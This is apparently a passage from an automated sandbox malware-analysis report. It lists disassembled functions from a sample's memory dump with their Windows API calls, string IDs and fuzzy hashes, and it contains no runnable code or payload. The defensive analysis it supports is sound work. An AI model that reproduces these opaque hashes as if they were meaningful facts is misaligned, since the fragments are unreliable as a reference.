                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                  • String ID: FILE
                                                                                  • API String ID: 4029003684-3121273764
                                                                                  • Opcode ID: 433aab2db2a342eaeb880a30f773e082e6ec30abf2b40660509aa95a7cc9d719
                                                                                  • Instruction ID: 0cd6c9a101b7b1f743df88673f323275b6407b770727c518d9ff3ff4b2016e80
                                                                                  • Opcode Fuzzy Hash: 433aab2db2a342eaeb880a30f773e082e6ec30abf2b40660509aa95a7cc9d719
                                                                                  • Instruction Fuzzy Hash: 2141F872A40349BADF20EBA5CC45FEF77FDDF49710F00446AFA00A7291D67199058764
                                                                                  Function 00A931BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AD032B
                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00AD0375
                                                                                    • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                                                    • Part of subcall function 00AA09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AA09E4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                                  • String ID: X
                                                                                  • API String ID: 3777226403-3081909835
                                                                                  • Opcode ID: b23c11b563842ae8c936e7ab56465160b8bfb0556a05a5cfbbe8074357445ccc
                                                                                  • Instruction ID: bf4bcfddf0cc8b1f7f13ad3c043b40bfe373e95ffee665ad3288ffa53cd4228b
                                                                                  • Opcode Fuzzy Hash: b23c11b563842ae8c936e7ab56465160b8bfb0556a05a5cfbbe8074357445ccc
                                                                                  • Instruction Fuzzy Hash: 4C219371A002989BDF41DF94C845BEE7BFCAF49300F10405AE405AB281DBB45A88DFA1
                                                                                  Function 00AFD1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d5cccf0d5c5a67a14bd9f4e62b054da3aa7068029f7a200de5c76fc5a20ffaa8
                                                                                  • Instruction ID: 7073dba45ca925c7e9318dbc020a0177d1c4abced0bd9f47e163cbb674f95284
                                                                                  • Opcode Fuzzy Hash: d5cccf0d5c5a67a14bd9f4e62b054da3aa7068029f7a200de5c76fc5a20ffaa8
                                                                                  • Instruction Fuzzy Hash: 44F158706083459FC715EF68C580A6ABBE6FF88314F14892EF9999B351DB30E945CF82
                                                                                  Function 00A91680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: acaae4c4b072aaef091b2d9943a1b02e2b099109738cc9ddf8250cb3eb53d635
                                                                                  • Instruction ID: 21c0083e88c9553d392776f4b1b7a73f73b1956f44aa6be5fb1a1ab758fee023
                                                                                  • Opcode Fuzzy Hash: acaae4c4b072aaef091b2d9943a1b02e2b099109738cc9ddf8250cb3eb53d635
                                                                                  • Instruction Fuzzy Hash: 8361AA71A0020AEBDF048F29D980AAE7BF5FF44350F6585A9EC19CF295EB31D960CB51
                                                                                  Function 00A8AAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA07EC
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA07F4
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA07FF
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA080A
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA0812
                                                                                    • Part of subcall function 00AA07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA081A
                                                                                    • Part of subcall function 00A9FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A8AC6B), ref: 00A9FFA7
                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A8AD08
                                                                                  • OleInitialize.OLE32(00000000), ref: 00A8AD85
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AC2F56
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1986988660-0
                                                                                  • Opcode ID: b9d705b28f7bf60f09c0ac731529a1f8f35173a413452facb1e4fcb4a1bf8c1e
                                                                                  • Instruction ID: 3c4b98b73b8a409178b193d3ab379d35634962d58b7c5eebf0d85ca70a4fcba4
                                                                                  • Opcode Fuzzy Hash: b9d705b28f7bf60f09c0ac731529a1f8f35173a413452facb1e4fcb4a1bf8c1e
                                                                                  • Instruction Fuzzy Hash: 0781ECB9A9C2408FC384EF39AD446657FE8FB5A31435089AAD418C7372EF300A49DF94
                                                                                  Function 00A959D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00A959F9
                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A95A9E
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A95ABB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_$_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1505330794-0
                                                                                  • Opcode ID: 3392c8e2d911915b522ed3a01b7a1fa975dd161797bdfcb0ce78d07d0ceb4b47
                                                                                  • Instruction ID: 534e0e9a215835a714b938f2f504c9a0ea7e5f1b9fe8d750e8796cfc95960e9b
                                                                                  • Opcode Fuzzy Hash: 3392c8e2d911915b522ed3a01b7a1fa975dd161797bdfcb0ce78d07d0ceb4b47
                                                                                  • Instruction Fuzzy Hash: 57319974A057018FDB21DF34D8C9697BBF4FB4A344F000A2EF69A87250DBB1A944CB56
                                                                                  Function 00AA593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00AA5953
                                                                                    • Part of subcall function 00AAA39B: __NMSG_WRITE.LIBCMT ref: 00AAA3C2
                                                                                    • Part of subcall function 00AAA39B: __NMSG_WRITE.LIBCMT ref: 00AAA3CC
                                                                                  • __NMSG_WRITE.LIBCMT ref: 00AA595A
                                                                                    • Part of subcall function 00AAA3F8: GetModuleFileNameW.KERNEL32(00000000,00B453BA,00000104,00000004,00000001,00AA1003), ref: 00AAA48A
                                                                                    • Part of subcall function 00AAA3F8: ___crtMessageBoxW.LIBCMT ref: 00AAA538
                                                                                    • Part of subcall function 00AA32CF: ___crtCorExitProcess.LIBCMT ref: 00AA32D5
                                                                                    • Part of subcall function 00AA32CF: ExitProcess.KERNEL32 ref: 00AA32DE
                                                                                    • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                                                  • RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1372826849-0
                                                                                  • Opcode ID: 7796bb318a61f804231a6843417501fdeba8b68dd3db4ea0eb27d8b485577bfc
                                                                                  • Instruction ID: 9f90a04531d1d2afcbf27843da9120a9f1e883670100dce9422282e7f93a0bad
                                                                                  • Opcode Fuzzy Hash: 7796bb318a61f804231a6843417501fdeba8b68dd3db4ea0eb27d8b485577bfc
                                                                                  • Instruction Fuzzy Hash: 4101D236A01F02EFEA152B349902A6F33589F53770F51042BF514AF1D2DFB08D404669
                                                                                  Function 00AE92C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00AE92D6
                                                                                    • Part of subcall function 00AA2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2F99
                                                                                    • Part of subcall function 00AA2F85: GetLastError.KERNEL32(00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2FAB
                                                                                  • _free.LIBCMT ref: 00AE92E7
                                                                                  • _free.LIBCMT ref: 00AE92F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                  • Instruction ID: 96d889ea7ad0cd6f1fa102ddfb50637997f48cdd2bf422d3839e25c8bdfb557c
                                                                                  • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                  • Instruction Fuzzy Hash: 78E0C2A12047025BCE20AB3D6A40FE777EC0F88311B14040DB509D3182CF20E8608228
                                                                                  Function 00A85E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CALL
                                                                                  • API String ID: 0-4196123274
                                                                                  • Opcode ID: b12053d989aaea4780ad7d77eea7c1af1a07d6903dbe2148f50cfff166259b00
                                                                                  • Instruction ID: 7d173dcd5e6313dbaeada6cefe1a3a4fcade035a9f11b2d6eeba01771f7371d4
                                                                                  • Opcode Fuzzy Hash: b12053d989aaea4780ad7d77eea7c1af1a07d6903dbe2148f50cfff166259b00
                                                                                  • Instruction Fuzzy Hash: 5D325874608341DFDB24EF24C594A6ABBF1BF84344F15896DE88A9B362D731EC45CB82
                                                                                  Function 00A948B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: EA06
                                                                                  • API String ID: 4104443479-3962188686
                                                                                  • Opcode ID: dfabd45478e923d9bf929e435202bafe84b5c0ce6358509b28bab881e01dbc43
                                                                                  • Instruction ID: 99f5eb2fd800f175c8661555911cbeba80e9fd498d8e547ed4dadf7df7e15572
                                                                                  • Opcode Fuzzy Hash: dfabd45478e923d9bf929e435202bafe84b5c0ce6358509b28bab881e01dbc43
                                                                                  • Instruction Fuzzy Hash: B0416A32F042585BDF219B648951FBF7FF58B5E300F684075E882EB386D6208D8693E2
                                                                                  Function 00AE6818 Relevance: 3.2, APIs: 2, Instructions: 216COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memmove.LIBCMT ref: 00AE68EC
                                                                                  • _memmove.LIBCMT ref: 00AE690A
                                                                                    • Part of subcall function 00AE6A73: _memmove.LIBCMT ref: 00AE6B01
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                                  • Instruction ID: 8b2f0b5b91901ed8c07aa8eed172fc6130311ffc8101d4f8099a5aee86d30333
                                                                                  • Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                                  • Instruction Fuzzy Hash: 1971A3705046849FCB24AF1AD945BAE77B5EF643E4F248D18ECD52B282CB35AD41CB50
                                                                                  Function 00AE6135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00AE614E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharLower
                                                                                  • String ID:
                                                                                  • API String ID: 2358735015-0
                                                                                  • Opcode ID: b9ccc20b679d3143a7df9cb64642db028464ec82dd4e3eb5f9289af4e7be52bd
                                                                                  • Instruction ID: 86ab53987fbc1a0a2cc08f144600fa80f03729f18f4d140da6bd95b06c61b766
                                                                                  • Opcode Fuzzy Hash: b9ccc20b679d3143a7df9cb64642db028464ec82dd4e3eb5f9289af4e7be52bd
                                                                                  • Instruction Fuzzy Hash: 7741C9B6A002499FDB11EF69C8819EEB7F8FF54390B104A2EE516D7241EB70DE40CB50
                                                                                  Function 00AA0E38 Relevance: 3.1, APIs: 2, Instructions: 94libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 00AA0ED5
                                                                                  • LoadLibraryExW.KERNELBASE ref: 00AA0EE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindLibraryLoadNotification
                                                                                  • String ID:
                                                                                  • API String ID: 1525634188-0
                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction ID: faf0e8abd85e8a6ad99b83854a581be77d23f9226f929786359fd89049be1482
                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction Fuzzy Hash: B031C571A00109DFDB28DF58C480969FBB6FF5A300B648AA5E409DB291E731EDC1DBC0
                                                                                  Function 00A95F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsThemeActive.UXTHEME ref: 00A95FEF
                                                                                    • Part of subcall function 00AA359C: __lock.LIBCMT ref: 00AA35A2
                                                                                    • Part of subcall function 00AA359C: DecodePointer.KERNEL32(00000001,?,00A96004,00AD8892), ref: 00AA35AE
                                                                                    • Part of subcall function 00AA359C: EncodePointer.KERNEL32(?,?,00A96004,00AD8892), ref: 00AA35B9
                                                                                    • Part of subcall function 00A95F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A95F18
                                                                                    • Part of subcall function 00A95F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A95F2D
                                                                                    • Part of subcall function 00A95240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A9526C
                                                                                    • Part of subcall function 00A95240: IsDebuggerPresent.KERNEL32 ref: 00A9527E
                                                                                    • Part of subcall function 00A95240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00A952E6
                                                                                    • Part of subcall function 00A95240: SetCurrentDirectoryW.KERNEL32(?), ref: 00A95366
                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A9602F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                  • String ID:
                                                                                  • API String ID: 1438897964-0
                                                                                  • Opcode ID: 95b4ed0e87b1f3f4ea78951d903415ee9dd0b63a5310bdd6718c992230dca05b
                                                                                  • Instruction ID: 98b4262840d1a1a71c66b6c879fbe8d72cd1dc63fcaad8cb08865a88c9542512
                                                                                  • Opcode Fuzzy Hash: 95b4ed0e87b1f3f4ea78951d903415ee9dd0b63a5310bdd6718c992230dca05b
                                                                                  • Instruction Fuzzy Hash: 99115E759083029BC711EF69ED4594ABBE8FF9A750F00891EF485872A1DFB09A44CF92
                                                                                  Function 00AA0FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA593C: __FF_MSGBANNER.LIBCMT ref: 00AA5953
                                                                                    • Part of subcall function 00AA593C: __NMSG_WRITE.LIBCMT ref: 00AA595A
                                                                                    • Part of subcall function 00AA593C: RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F
                                                                                  • std::exception::exception.LIBCMT ref: 00AA101C
                                                                                  • __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                                                    • Part of subcall function 00AA87CB: RaiseException.KERNEL32(?,?,?,00B3CAF8,?,?,?,?,?,00AA1036,?,00B3CAF8,?,00000001), ref: 00AA8820
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 3902256705-0
                                                                                  • Opcode ID: 008d50e0b8a39efd63f3edc43d1f8c1d0be25af7841c343e41b2237b9a6f9c03
                                                                                  • Instruction ID: c29012550bc96f7a9a38a9381752da7bd97df58876ccca8df5265c61e2648757
                                                                                  • Opcode Fuzzy Hash: 008d50e0b8a39efd63f3edc43d1f8c1d0be25af7841c343e41b2237b9a6f9c03
